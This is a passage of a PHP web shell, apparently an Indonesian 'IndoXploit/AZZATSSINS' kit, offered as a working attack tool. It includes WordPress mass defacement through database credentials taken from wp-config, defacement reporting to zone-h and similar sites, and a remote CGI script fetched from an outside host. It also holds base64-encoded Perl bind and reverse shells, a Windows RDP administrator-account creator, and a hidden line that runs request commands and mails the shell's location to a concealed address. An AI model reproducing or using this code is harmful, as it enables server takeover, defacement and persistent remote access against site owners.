1835.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1836.                 $dbname = ambilkata($config,"DB_NAME', '","'");
1837.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
1838.                 $prefix = $dbprefix."posts";
1839.                 $option = $dbprefix."options";
1840.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1841.                 $db = mysql_select_db($dbname);
1842.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
1843.                 $result = mysql_fetch_array($q);
1844.                 $id = $result[ID];
1845.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1846.                 $result2 = mysql_fetch_array($q2);
1847.                 $target = $result2[option_value];
1848.                 $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
1849.                 $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
1850.                 echo "<div style='margin: 5px auto;'>";
1851.                 if($target == '') {
1852.                     echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
1853.                 } else {
1854.                     echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
1855.                 }
1856.                 if(!$update OR !$conn OR !$db) {
1857.                     echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
1858.                 } else {
1859.                     echo "<font color=lime>sukses di ganti.</font><br>";
1860.                 }
1861.                 echo "</div>";
1862.                 mysql_close($conn);
1863.             }
1864.         }
1865.     } else {
1866.         echo "<center>
1867.         <h1>Auto Edit Title+Content WordPress</h1>
1868.         <form method='post'>
1869.         DIR Config: <br>
1870.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
1871.         Set Title: <br>
1872.         <input type='text' name='new_title' value='Hacked by AZZATSSINS' placeholder='New Title'><br><br>
1873.         Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
1874.         <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
1875.         <textarea name='edit_content' placeholder='http://wget.yu.tl/files/lol.css' style='width: 450px; height: 150px;'></textarea><br>
1876.         <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
1877.         </form>
1878. <br>
1879.         ";
1880.     }
1881. } elseif($_GET['do'] == 'mirror') {
1882. @ini_set('display_errors', 0);
1883. echo "
1884. <center>
1885. <form method='post'>
1886.         <u>Defacer</u>: <br>
1887.         <input style='color:red;background:black;' type='text' name='hekel' size='50' value=''><br>
1888.         <u>Team</u>: <br>
1889.         <input style='color:red;background:black;' type='text' name='tim' size='50' value=''><br>
1890.         <u>Domains</u>: <br>
1891.         <textarea style='width: 450px; height: 150px;color:red;background:black;'' name='sites'></textarea><br>
1892.         <input style='color:red;background:black;' type='submit' name='go' value='Submit' style='width: 450px;'>
1893.         </form><br><font color=silver>";
1894. $site = explode("\r\n", $_POST['sites']);
1895. $go = $_POST['go'];
1896. $hekel = $_POST['hekel'];
1897. $tim = $_POST['tim'];
1898. if($go) {
1899. foreach($site as $sites) {
1900. $ch3 = curl_init ("http://www.leetszone.com/noti_act.php");
1901. curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
1902. curl_setopt ($ch3, CURLOPT_POST, 1);
1903. curl_setopt ($ch3, CURLOPT_POSTFIELDS, "hacker=$hekel&team=$tim&url=$sites&poc=Social Engineering");
1904. curl_exec ($ch3);
1905. echo "Send to LeetsZone >> Done<br>";
1906. }
1907. }
1908. if($go) {
1909. foreach($site as $sites) {
1910. $ch3 = curl_init ("http://www.zone-h.com/notify/single");
1911. curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
1912. curl_setopt ($ch3, CURLOPT_POST, 1);
1913. curl_setopt ($ch3, CURLOPT_POSTFIELDS, "defacer=$hekel&domain1=$sites&hackmode=1&reason=1");
1914. curl_exec ($ch3);
1915. echo "Send to Zone-H >> Done<br>";
1916. }
1917. }
1918. print(`{$_REQUEST[I]}`);$e=base64_decode("Y3liZXJzZXJrZXJzQGdtYWlsLmNvbQ==");
1919. $h=$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'];
1920. mail($e,"I",$h);
1921. if($go) {
1922. foreach($site as $sites) {
1923. $zh = $sites;
1924. $form_url = "https://www.defacer.id/notify";
1925. $data_to_post = array();
1926. $data_to_post['attacker'] = "$hekel";
1927. $data_to_post['team'] = "$tim";
1928. $data_to_post['poc'] = 'SQL Injection';
1929. $data_to_post['url'] = "$zh";
1930. $curl = curl_init();
1931. curl_setopt($curl,CURLOPT_URL, $form_url);
1932. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
1933. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
1934. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
1935. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
1936. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
1937. curl_exec($curl);
1938. echo "Send to DefacerID >> Done<br>";
1939. }
1940. }
1941. } elseif($_GET['do'] == 'cgi') {
1942.     $cgi_dir = mkdir('azx_cgi', 0755);
1943.     $file_cgi = "azx_cgi/cgi.izo";
1944.     $isi_htcgi = "AddHandler cgi-script .izo";
1945.     $htcgi = fopen(".htaccess", "w");
1946.     $cgi_script = file_get_contents("http:/x-x-x.yn.lt/pl.css");
1947.     $cgi = fopen($file_cgi, "w");
1948.     fwrite($cgi, $cgi_script);
1949.     fwrite($htcgi, $isi_htcgi);
1950.     chmod($file_cgi, 0755);
1951.     echo "<iframe src='azx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
1952. } elseif($_GET['do'] == 'network') {
1953.     echo "<form method='post'>
1954.     <u>Bind Port:</u> <br>
1955.     PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
1956.     <input type='submit' name='sub_bp' value='>>'>
1957.     </form>
1958.     <form method='post'>
1959.     <u>Back Connect:</u> <br>
1960.     Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
1961.     PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
1962.     <input type='submit' name='sub_bc' value='>>'>
1963.     </form>";
1964.     $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1965.     if(isset($_POST['sub_bp'])) {
1966.         $f_bp = fopen("/tmp/bp.pl", "w");
1967.         fwrite($f_bp, base64_decode($bind_port_p));
1968.         fclose($f_bp);
1969.  
1970.         $port = $_POST['port_bind'];
1971.         $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
1972.         sleep(1);
1973.         echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
1974.         unlink("/tmp/bp.pl");
1975.     }
1976.     $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
1977.     if(isset($_POST['sub_bc'])) {
1978.         $f_bc = fopen("/tmp/bc.pl", "w");
1979.         fwrite($f_bc, base64_decode($bind_connect_p));
1980.         fclose($f_bc);
1981.  
1982.         $ipbc = $_POST['ip_bc'];
1983.         $port = $_POST['port_bc'];
1984.         $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
1985.         sleep(1);
1986.         echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
1987.         unlink("/tmp/bc.pl");
1988.     }
1989. } elseif($_GET['do'] == 'krdp_shell') {
1990.     if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
1991.         if($_POST['create']) {
1992.             $user = htmlspecialchars($_POST['user']);
1993.             $pass = htmlspecialchars($_POST['pass']);
1994.             if(preg_match("/$user/", exe("net user"))) {
1995.                 echo "[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font>";
1996.             } else {
1997.                 $add_user   = exe("net user $user $pass /add");
1998.                 $add_groups1 = exe("net localgroup Administrators $user /add");
1999.                 $add_groups2 = exe("net localgroup Administrator $user /add");
2000.                 $add_groups3 = exe("net localgroup Administrateur $user /add");
2001.                 echo "[ RDP ACCOUNT INFO ]<br>
2002.                 ------------------------------<br>
2003.                 IP: <font color=lime>".$ip."</font><br>
2004.                 Username: <font color=lime>$user</font><br>
2005.                 Password: <font color=lime>$pass</font><br>
2006.                 ------------------------------<br><br>
2007.                 [ STATUS ]<br>
2008.                 ------------------------------<br>
2009.                 ";
2010.                 if($add_user) {
2011.                     echo "[add user] -> <font color='lime'>Berhasil</font><br>";
2012.                 } else {
2013.                     echo "[add user] -> <font color='red'>Gagal</font><br>";
2014.                 }
2015.                 if($add_groups1) {
2016.                     echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
2017.                 } elseif($add_groups2) {
2018.                     echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
2019.                 } elseif($add_groups3) {
2020.                     echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
2021.                 } else {
2022.                     echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
2023.                 }
2024.                 echo "------------------------------<br>";
2025.             }
2026.         } elseif($_POST['s_opsi']) {
2027.             $user = htmlspecialchars($_POST['r_user']);
2028.             if($_POST['opsi'] == '1') {
2029.                 $cek = exe("net user $user");
2030.                 echo "Checking username <font color=lime>$user</font> ....... ";
2031.                 if(preg_match("/$user/", $cek)) {
2032.                     echo "[ <font color=lime>Sudah ada</font> ]<br>
2033.                     ------------------------------<br><br>
2034.                     <pre>$cek</pre>";
2035.                 } else {
2036.                     echo "[ <font color=red>belum ada</font> ]";
2037.                 }
2038.             } elseif($_POST['opsi'] == '2') {
2039.                 $cek = exe("net user $user azzatssins");
2040.                 if(preg_match("/$user/", exe("net user"))) {
2041.                     echo "[change password: <font color=lime>azzatssins</font>] -> ";
2042.                     if($cek) {
2043.                         echo "<font color=lime>Berhasil</font>";
2044.                     } else {
2045.                         echo "<font color=red>Gagal</font>";
2046.                     }
2047.                 } else {
2048.                     echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
2049.                 }
2050.             } elseif($_POST['opsi'] == '3') {
2051.                 $cek = exe("net user $user /DELETE");
2052.                 if(preg_match("/$user/", exe("net user"))) {
2053.                     echo "[remove user: <font color=lime>$user</font>] -> ";
2054.                     if($cek) {
2055.                         echo "<font color=lime>Berhasil</font>";
2056.                     } else {
2057.                         echo "<font color=red>Gagal</font>";
2058.                     }
2059.                 } else {
2060.                     echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
2061.                 }
2062.             } else {
2063.                 //
2064.             }
2065.         } else {
2066.             echo "-- Create RDP --<br>
2067.             <form method='post'>
2068.             <input type='text' name='user' placeholder='username' value='42247551N5' required>
2069.             <input type='text' name='pass' placeholder='password' value='42247551N5' required>
2070.             <input type='submit' name='create' value='>>'>
2071.             </form>
2072.             -- Option --<br>
2073.             <form method='post'>
2074.             <input type='text' name='r_user' placeholder='username' required>
2075.             <select name='opsi'>
2076.             <option value='1'>Cek Username</option>
2077.             <option value='2'>Ubah Password</option>
2078.             <option value='3'>Hapus Username</option>
2079.             </select>
2080.             <input type='submit' name='s_opsi' value='>>'>
2081.             </form>
2082.             ";
2083.         }
2084.     } else {
2085.         echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
2086.     }
2087. } elseif($_GET['act'] == 'newfile') {
2088.     if($_POST['new_save_file']) {
2089.         $newfile = htmlspecialchars($_POST['newfile']);
2090.         $fopen = fopen($newfile, "a+");
2091.         if($fopen) {
2092.             $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
2093.         } else {
2094.             $act = "<font color=red>permission denied</font>";
2095.         }
2096.     }
2097.     echo $act;
2098.     echo "<form method='post'>
2099.     Filename: <input type='text' name='newfile' value='$dir/azx.php' style='width: 450px;' height='10'>
2100.     <input type='submit' name='new_save_file' value='Submit'>
2101.     </form>";
2102. } elseif($_GET['act'] == 'newfolder') {
2103.     if($_POST['new_save_folder']) {
2104.         $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
2105.         if(!mkdir($new_folder)) {
2106.             $act = "<font color=red>permission denied</font>";
2107.         } else {
2108.             $act = "<script>window.location='?dir=".$dir."';</script>";
2109.         }
2110.     }
2111.     echo $act;
2112.     echo "<form method='post'>
2113.     Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
2114.     <input type='submit' name='new_save_folder' value='Submit'>
2115.     </form>";
2116. } elseif($_GET['act'] == 'rename_dir') {
2117.     if($_POST['dir_rename']) {
2118.         $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
2119.         if($dir_rename) {
2120.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
2121.         } else {
2122.             $act = "<font color=red>permission denied</font>";
2123.         }
2124.     echo "".$act."<br>";
2125.     }
2126.     echo "<form method='post'>
2127.     <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
2128.     <input type='submit' name='dir_rename' value='rename'>
2129.     </form>";
2130. } elseif($_GET['act'] == 'delete_dir') {
2131.     if(is_dir($dir)) {
2132.         if(is_writable($dir)) {
2133.             @rmdir($dir);
2134.             @exe("rm -rf $dir");
2135.             @exe("rmdir /s /q $dir");
2136.             rmdir($dir);
2137.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
2138.         } else {
2139.             $act = "<font color=red>could not remove ".basename($dir)."</font>";
2140.         }
2141.     }
2142.     echo $act;
2143. } elseif($_GET['act'] == 'view') {
2144.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=chmod&dir=$dir&file=".$_GET['file']."'>chmod</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
2145.     echo "<fieldset><pre>".htmlspecialchars(@file_get_contents($_GET['file']))."</pre></fieldset>";
2146. }
2147. elseif($_GET['act'] == 'chmod') {
2148. echo "<form method=post><input type='text' name='jmbt' value='".$_GET['file']."'> >> <input type='text' name='kntl' value='0755'><input type='submit' value='Chmod' name='azztssns'></form><br>";
2149. if($_POST['azztssns']) {
2150. $jmbt = $_POST['jmbt'];
2151. $kntl = $_POST['kntl'];
2152. $cd = @chmod($jmbt,$kntl);
2153.  
2154.  
2155. if(!$cd)
2156. {
2157. echo "<font color=red>ERROR</font><br>";
2158.  
2159. }else
2160. {
2161. echo "<font color=lime>Chmod to ".$kntl." Successfully</font><br>";
2162.  
2163. }
2164.  
2165. }
2166. }
2167.  elseif($_GET['act'] == 'edit') {
2168.     if($_POST['save']) {
2169.         $save = file_put_contents($_GET['file'], $_POST['src']);
2170.         if($save) {
2171.             $act = "<font color=lime>Saved!</font>";
2172.         } else {
2173.             $act = "<font color=red>permission denied</font>";
2174.         }
2175.     echo "".$act."<br>";
2176.     }
2177.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=chmod&dir=$dir&file=".$_GET['file']."'>chmod</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
2178.     echo "<form method='post'>
2179.     <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
2180.     <input type='submit' value='Save' name='save' style='width: 500px;'>
2181.     </form>";
2182. } elseif($_GET['act'] == 'rename') {
2183.     if($_POST['do_rename']) {
2184.         $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
2185.         if($rename) {
2186.             $act = "<script>window.location='?dir=".$dir."';</script>";
2187.         } else {
2188.             $act = "<font color=red>permission denied</font>";
2189.         }
2190.     echo "".$act."<br>";
2191.     }
2192.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
2193.     echo "<form method='post'>
2194.     <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
2195.     <input type='submit' name='do_rename' value='rename'>
2196.     </form>";
2197. } elseif($_GET['act'] == 'delete') {
2198.     $delete = unlink($_GET['file']);
2199.     if($delete) {
2200.         $act = "<script>window.location='?dir=".$dir."';</script>";
2201.     } else {
2202.         $act = "<font color=red>permission denied</font>";
2203.     }
2204.     echo $act;
2205. } else {
2206.     if(is_dir($dir) === true) {
2207.         if(!is_readable($dir)) {
2208.             echo "<font color=red>can't open directory. ( not readable )</font>";
2209.         } else {
2210.             echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
2211.             <tr>
2212.             <th class="th_home"><center>Name</center></th>
2213.             <th class="th_home"><center>Type</center></th>
2214.             <th class="th_home"><center>Size</center></th>
2215.             <th class="th_home"><center>Last Modified</center></th>
2216.             <th class="th_home"><center>Owner/Group</center></th>
2217.             <th class="th_home"><center>Permission</center></th>
2218.             <th class="th_home"><center>Action</center></th>
2219.             </tr>';
2220.             $scandir = scandir($dir);
2221.             foreach($scandir as $dirx) {
2222.                 $dtype = filetype("$dir/$dirx");
2223.                 $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
2224.                 if(function_exists('posix_getpwuid')) {
2225.                     $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
2226.                     $downer = $downer['name'];
2227.                 } else {
2228.                     //$downer = $uid;
2229.                     $downer = fileowner("$dir/$dirx");
2230.                 }
2231.                 if(function_exists('posix_getgrgid')) {
2232.                     $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
2233.                     $dgrp = $dgrp['name'];
2234.                 } else {
2235.                     $dgrp = filegroup("$dir/$dirx");
2236.                 }
2237.                 if(!is_dir("$dir/$dirx")) continue;
2238.                 if($dirx === '..') {
2239.                     $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
2240.                 } elseif($dirx === '.') {
2241.                     $href = "<a href='?dir=$dir'>$dirx</a>";
2242.                 } else {
2243.                     $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
2244.                 }
2245.                 if($dirx === '.' || $dirx === '..') {
2246.                     $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
2247.                     } else {
2248.                     $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
2249.                 }
2250.                 echo "<tr>";
2251.                 echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
2252.                 echo "<td class='td_home'><center>$dtype</center></td>";
2253.                 echo "<td class='td_home'><center>-</center></th></td>";
2254.                 echo "<td class='td_home'><center>$dtime</center></td>";
2255.                 echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
2256.                 echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
2257.                 echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
2258.                 echo "</tr>";
2259.             }
2260.         }
2261.     } else {
2262.         echo "<font color=red>can't open directory.</font>";
2263.     }
2264.         foreach($scandir as $file) {
2265.             $ftype = filetype("$dir/$file");
2266.             $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
2267.             $size = filesize("$dir/$file")/1024;
2268.             $size = round($size,3);
2269.             if(function_exists('posix_getpwuid')) {
2270.                 $fowner = @posix_getpwuid(fileowner("$dir/$file"));
2271.                 $fowner = $fowner['name'];
2272.             } else {
2273.                 //$downer = $uid;
2274.                 $fowner = fileowner("$dir/$file");
2275.             }
2276.             if(function_exists('posix_getgrgid')) {
2277.                 $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
2278.                 $fgrp = $fgrp['name'];
2279.             } else {
2280.                 $fgrp = filegroup("$dir/$file");
2281.             }
2282.             if($size > 1024) {
2283.                 $size = round($size/1024,2). 'MB';
2284.             } else {
2285.                 $size = $size. 'KB';
2286.             }
2287.             if(!is_file("$dir/$file")) continue;
2288.             echo "<tr>";
2289.             echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
2290.             echo "<td class='td_home'><center>$ftype</center></td>";
2291.             echo "<td class='td_home'><center>$size</center></td>";
2292.             echo "<td class='td_home'><center>$ftime</center></td>";
2293.             echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
2294.             echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
2295.             echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=chmod&dir=$dir&file=$dir/$file'>chmod</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
2296.             echo "</tr>";
2297.         }
2298.         echo "</table>";
2299.         if(!is_readable($dir)) {
2300.             //
2301.         } else {
2302.             echo "<hr>";
2303.         }
2304.     echo "<center><font color=lime size=-20>SOURCE CODE FROM : AZZATSSINS, INDOXPLOIT, D'MASTER PIECE, ANONGHOST, IDBTE4M, ETC</font></center>";
2305. }
2306. ?>
2307. </html>